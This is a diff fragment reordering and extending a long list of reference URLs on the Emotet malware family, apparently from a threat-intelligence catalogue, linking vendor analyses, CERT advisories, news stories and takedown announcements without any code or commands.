+ "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
+ "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/",
+ "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/",
+ "https://www.us-cert.gov/ncas/alerts/TA18-201A",
+ "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b",
+ "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff",
+ "https://github.com/d00rt/emotet_research",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
+ "https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/",
+ "https://unit42.paloaltonetworks.com/emotet-command-and-control/",
+ "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/",
+ "https://blogs.cisco.com/security/emotet-is-back",
+ "https://blog.threatlab.info/malware-analysis-emotet-infection/",
+ "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates",
+ "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code",
+ "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
+ "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/",
+ "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
+ "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
+ "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/",
+ "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
+ "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/",
+ "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure",
+ "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf",
+ "https://pl-v.github.io/plv/posts/Emotet-unpacking/",
+ "https://intel471.com/blog/emotet-takedown-2021/",
+ "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
+ "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html",
+ "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/",
+ "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf",
+ "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
+ "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
+ "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros",
+ "https://www.bitsight.com/blog/emotet-botnet-rises-again",
+ "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents",
+ "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action",
+ "https://unit42.paloaltonetworks.com/new-emotet-infection-method/",
+ "https://github.com/cecio/EMOTET-2020-Reversing",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html",
+ "https://securelist.com/the-chronicles-of-emotet/99660/",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis",
+ "https://hatching.io/blog/powershell-analysis",
+ "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
+ "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
+ "https://twitter.com/raashidbhatt/status/1237853549200936960",
+ "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://unit42.paloaltonetworks.com/domain-parking/",
+ "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii",
+ "https://cyber.wtf/2021/11/15/guess-whos-back/",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
+ "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html",
"https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures",
"https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/",
- "https://muha2xmad.github.io/unpacking/emotet-part-1/",
- "https://mirshadx.wordpress.com/2020/11/22/analyzing-an-emotet-dropper-and-writing-a-python-script-to-statically-unpack-payload/",
- "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
- "https://github.com/d00rt/emotet_research",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612",
- "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
- "https://blogs.vmware.com/security/2022/03/emotet-c2-configuration-extraction-and-analysis.html",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage",
- "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis",
- "https://muha2xmad.github.io/unpacking/emotet-part-2/",
- "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
- "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
- "https://intel471.com/blog/emotet-takedown-2021/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
- "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol",
- "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/",
- "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
- "https://unit42.paloaltonetworks.com/emotet-command-and-control/",
- "https://www.fortinet.com/blog/threat-research/Trends-in-the-recent-emotet-maldoc-outbreak",
- "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service",
- "https://twitter.com/milkr3am/status/1354459859912192002",
- "https://cyber.wtf/2022/03/23/what-the-packer/",
- "https://twitter.com/raashidbhatt/status/1237853549200936960",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://paste.cryptolaemus.com",
- "https://www.cert.pl/en/news/single/whats-up-emotet/",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html",
- "https://www.hornetsecurity.com/en/security-information/emotet-update-increases-downloads/",
- "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/",
- "https://blog.threatlab.info/malware-analysis-emotet-infection/",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128",
- "https://isc.sans.edu/forums/diary/Emotet+infections+and+followup+malware/24532/",
- "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.checkpoint.com/press/2022/march-2022s-most-wanted-malware-easter-phishing-scams-help-emotet-assert-its-dominance/",
- "https://securelist.com/financial-cyberthreats-in-2020/101638/",
- "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
- "https://github.com/mauronz/binja-emotet",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/",
- "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
- "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
- "https://www.youtube.com/watch?v=5_-oR_135ss",
- "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
- "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/",
- "https://maxkersten.nl/binary-analysis-course/malware-analysis/emotet-droppers/",
- "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/",
- "https://research.checkpoint.com/emotet-tricky-trojan-git-clones/",
- "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
- "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf",
- "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
- "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
- "https://cert-agid.gov.it/news/malware/semplificare-lanalisi-di-emotet-con-python-e-iced-x86/",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://www.netresec.com/?page=Blog&month=2022-05&post=Emotet-C2-and-Spam-Traffic-Video",
- "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/",
- "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
- "https://www.atomicmatryoshka.com/post/malware-headliners-emotet",
- "https://blog.talosintelligence.com/2020/11/emotet-2020.html",
- "https://isc.sans.edu/diary/rss/27036",
- "https://www.us-cert.gov/ncas/alerts/TA18-201A",
- "https://www.esentire.com/security-advisories/emotet-activity-identified",
- "https://www.bitsight.com/blog/emotet-botnet-rises-again",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html",
- "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
- "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/",
- "https://isc.sans.edu/diary/28044",
- "https://experience.mandiant.com/trending-evil-2/p/1",
- "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
- "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
- "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
- "http://ropgadget.com/posts/defensive_pcres.html",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
- "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
- "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/",
- "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf",
- "https://unit42.paloaltonetworks.com/domain-parking/",
- "https://www.bitsight.com/blog/emotet-smb-spreader-back",
"https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf",
- "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf",
- "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
- "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
- "https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/",
- "https://hatching.io/blog/powershell-analysis",
- "https://isc.sans.edu/forums/diary/Emotet+Stops+Using+0000+in+Spambot+Traffic/28270/",
- "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
- "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/",
- "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
+ "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/",
+ "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/",
+ "https://www.hornetsecurity.com/en/security-information/emotet-is-back/",
+ "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html",
+ "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/",
+ "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet",
"https://persianov.net/emotet-malware-analysis-part-2",
+ "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
+ "https://www.youtube.com/watch?v=5_-oR_135ss",
+ "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion",
+ "https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html",
+ "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html",
+ "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html",
+ "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/",
+ "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
+ "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a",
+ "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/",
+ "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor",
+ "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/",
+ "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/",
+ "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/",
+ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf",
+ "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612",
+ "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much",
+ "https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/",
+ "https://muha2xmad.github.io/unpacking/emotet-part-1/",
+ "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them",
+ "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection",
+ "https://blog.talosintelligence.com/emotet-switches-to-onenote/",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
+ "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html",
+ "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de",
+ "https://www.youtube.com/watch?v=8PHCZdpNKrw",
+ "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc",
+ "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service",
+ "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/",
+ "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/",
+ "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet",
+ "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines",
+ "https://asec.ahnlab.com/en/33600/",
+ "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/",
+ "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/",
+ "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/",
+ "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/",
"https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/",
+ "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://securelist.com/emotet-modules-and-recent-attacks/106290/",
+ "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break",
+ "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022",
+ "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure",
+ "https://twitter.com/eduardfir/status/1461856030292422659",
+ "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/",
+ "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis",
+ "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903",
+ "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/",
+ "https://persianov.net/emotet-malware-analysis-part-1",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf",
+ "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
+ "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728",
+ "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/",
+ "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf",
+ "https://www.tgsoft.it/files/report/download.asp?id=7481257469",
+ "https://github.com/mauronz/binja-emotet",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/",
+ "https://experience.mandiant.com/trending-evil-2/p/1",
+ "https://www.youtube.com/watch?v=AkZ5TYBqcU4",
+ "https://spamauditor.org/2020/10/the-many-faces-of-emotet/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://www.lac.co.jp/lacwatch/people/20201106_002321.html",
+ "https://isc.sans.edu/diary/rss/28254",
+ "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf",
+ "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction",
+ "https://twitter.com/Cryptolaemus1/status/1516535343281025032",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/",
+ "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/",
+ "https://feodotracker.abuse.ch/?filter=version_e",
+ "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/",
+ "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet",
+ "https://twitter.com/milkr3am/status/1354459859912192002",
+ "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/",
+ "https://www.secureworks.com/research/threat-profiles/gold-crestwood",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
+ "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/",
+ "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers",
+ "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack",
+ "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html",
+ "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/",
+ "https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/",
+ "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/",
+ "https://paste.cryptolaemus.com",
+ "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html",
+ "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html",
+ "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/",
+ "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure",
+ "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html",
+ "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/",
+ "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html",
+ "https://www.digitalshadows.com/blog-and-research/emotet-disruption/",
+ "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb",
+ "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://www.bleepingcomputer.com/news/security/emotet-malware-attacks-return-after-three-month-break/",
+ "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
+ "https://www.binarydefense.com/emocrash-exploiting-a-vulnerability-in-emotet-malware-for-defense/",
+ "https://www.justice.gov/opa/pr/emotet-botnet-disrupted-international-cyber-operation",
+ "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-in-emotet-trojan-campaign-pt-one",
+ "https://cyber.wtf/2022/03/23/what-the-packer/",
+ "https://blogs.jpcert.or.jp/en/2019/12/emotetfaq.html",
+ "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_workshop_malware-analysis_jp.pdf",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
+ "https://www.blueliv.com/blog/research/where-is-emotet-latest-geolocation-data/",
+ "https://www.dsih.fr/article/4483/emotet-de-retour-poc-exchange-0-day-windows-a-quelle-sauce-les-attaquants-prevoient-de-nous-manger-cette-semaine.html",
+ "https://cdn.www.carbonblack.com/wp-content/uploads/2020/05/VMWCB-Report-Modern-Bank-Heists-2020.pdf",
+ "https://www.heise.de/ct/artikel/Was-Emotet-anrichtet-und-welche-Lehren-die-Opfer-daraus-ziehen-4665958.html",
+ "https://www.lac.co.jp/lacwatch/alert/20211119_002801.html",
+ "https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware",
+ "https://www.bitsight.com/blog/emotet-smb-spreader-back",
+ "https://www.zscaler.com/blogs/security-research/return-emotet-malware",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://forensicitguy.github.io/shortcut-to-emotet-ttp-change/",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://blog.kryptoslogic.com/malware/2018/10/31/emotet-email-theft.html",
+ "https://twitter.com/ContiLeaks/status/1498614197202079745",
+ "https://www.atomicmatryoshka.com/post/malware-headliners-emotet",
+ "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
+ "https://www.picussecurity.com/blog/emotet-technical-analysis-part-2-powershell-unveiled",
+ "https://d00rt.github.io/emotet_network_protocol/",
+ "https://www.binarydefense.com/emotet-wi-fi-spreader-upgraded/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://kienmanowar.wordpress.com/2022/01/23/quicknote-emotet-epoch4-epoch5-tactics/",
+ "https://www.proofpoint.com/us/blog/threat-insight/emotet-tests-new-delivery-techniques",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-emotet-hijacks-windows-api-evades-sandbox-analysis/",
+ "https://www.cert.pl/en/news/single/whats-up-emotet/",
+ "https://www.fortinet.com/blog/threat-research/deep-dive-into-emotet-malware.html",
+ "https://www.kroll.com/en/insights/publications/cyber/monitor/emotet-analysis-new-lnk-in-the-infection-chain",
+ "https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return",
+ "https://www.youtube.com/watch?v=_mGMJFNJWSk",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://thehackernews.com/2022/02/notorious-trickbot-malware-gang-shuts.html",
+ "https://www.melani.admin.ch/melani/de/home/dokumentation/newsletter/Trojaner_Emotet_greift_Unternehmensnetzwerke_an.html",
+ "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
+ "https://securelist.com/financial-cyberthreats-in-2020/101638/",
+ "https://team-cymru.com/blog/2021/01/27/taking-down-emotet/",
+ "https://research.checkpoint.com/2021/when-old-friends-meet-again-why-emotet-chose-trickbot-for-rebirth/",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmwcb-report-modern-bank-heists-2020.pdf",
+ "https://www.hornetsecurity.com/en/threat-research/emotet-botnet-takedown/",
